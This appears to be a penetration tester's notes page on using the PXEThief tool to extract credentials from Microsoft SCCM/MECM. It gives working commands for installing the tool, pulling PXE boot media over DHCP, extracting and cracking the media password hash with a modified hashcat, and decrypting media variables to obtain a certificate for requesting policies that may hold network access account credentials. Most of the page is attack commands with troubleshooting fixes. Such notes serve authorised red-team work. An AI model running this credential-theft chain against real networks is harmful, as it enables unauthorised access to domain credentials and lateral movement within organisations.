# pxethief [pxethief](https://github.com/MWR-CyberSec/PXEThief) helps you get creds out of SCCM. :::info Good news! I've got good success getting pxethief to run on Linux by following these steps. First, get the proper ``` git clone https://github.com/MWR-CyberSec/PXEThief.git cd PXEThief git fetch origin pull/11/head:pr-11 git checkout pr-11 ``` Then I found this works pretty well for getting it rocking in a venv: ``` python3 -m venv venv source venv/bin/activate sudo venv/bin/python3 -m pip install -r requirements.txt sudo venv/bin/python3 pxethief.py ``` ::: ## Install Get python install from python.org - 64bit installer ``` pip install -r requirements.txt ``` I'm having [this issue](https://github.com/MWR-CyberSec/PXEThief/issues/10). ## General enumeration - automatically download encrypted media file using DHCP PXE ``` pxethief.py 1 ``` ## Target a specific MECM DP ``` pxethief.py 2 1.2.3.4 ``` :::tip For automatic exploitation to happen, you need to have TFTP installed for Windows: ``` powershell Enable-WindowsOptionalFeature -FeatureName TFTP -Online ``` ::: ## Identify hash of the password that was used to encrypt the variables ``` pxethief.py 5 boot.var ``` *Note: the `boot.var` is a file you might find in the `\\SCCMSERVER\REMINST\SMSTEMP` folder* ### Crack the extracted hash I found it easier to use the [hashcat-6.2.6-SCCM](https://github.com/The-Viper-One/hashcat-6.2.6-SCCM) version of hashcat, and then use this syntax: ``` hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt ``` ## Decrypt and retrieve contents of the media variables file (if cracking was successful) ``` pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE ``` At this point you should be able to get a certificate that will be used to request SCCM policies and task sequences which may have the NAA or other creds. :::tip I sometimes have a heck of a time getting this attack to work, but I opened a GitHub [issue](https://github.com/MWR-CyberSec/PXEThief/issues/12) that helped me. I also had a situation where the decryption routine seemed to work and I got a funky `UnicodeDecodeError: 'utf-16-le' codec can't decode bytes in position 236-237: illegal encoding` error. I opened an [issue](https://github.com/MWR-CyberSec/PXEThief/issues/14) for this and the fix ended up being to comment/uncomment some lines following [this guidance](https://github.com/MWR-CyberSec/PXEThief/issues/1#issuecomment-1833467137) and then setting `USING_TLS` to `False` in the script: ``` USING_TLS = False #HTTPS and client certificate support ``` :::